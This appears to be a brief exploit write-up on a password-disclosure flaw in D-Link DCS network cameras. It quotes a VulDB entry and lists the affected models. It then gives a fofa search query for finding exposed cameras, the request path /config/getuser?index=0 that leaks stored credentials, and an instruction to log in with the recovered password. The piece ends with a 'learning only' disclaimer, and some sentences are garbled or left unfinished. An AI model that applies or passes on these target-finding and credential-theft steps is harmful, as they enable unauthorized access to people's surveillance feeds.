D-Link DCS-2200 is a surveillance camera. The imaging color is color. It is a network camera.
D-Link DCS series monitoring obtains account and password information by accessing a specific URL. An attacker can enter the background through a vulnerability and obtain the video monitoring page.
The original text of the information seen according to VULDB is as follows
A vulnerability, which was classified as problematic, was found in D-Link DCS-2530L and DCS-2670L (the affected version unknown). This affects some unknown processing of the file /config/getuser. The manipulation with an unknown input leads to a information disclosure vulnerability (Password). CWE is classifying the issue as CWE-200. This is going to have an impact on confidentiality. The summary by CVE is:
Affected versions:
DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703
Vulnerability recurrence:
fofa search:
app="D_Link-DCS-4622"(上方影响版本都可以)
Use poc to check the account password and log in after getting the password.
/config/getuser?index=0
Special statement:
Any direct or indirect consequences and losses caused by the dissemination and use of the information provided in this article are the responsibility of the user himself, and I do not assume any responsibility for this.
The author has the right to modify and interpret this article. If you wish to reprint or disseminate this article, you must ensure the integrity of this article, including the copyright statement and all other contents. Without the permission of the author, the content of this article may not be arbitrarily modified, added or deleted, and it may not be used for commercial purposes in any way. Do not use it for illegal purposes, only for learning reference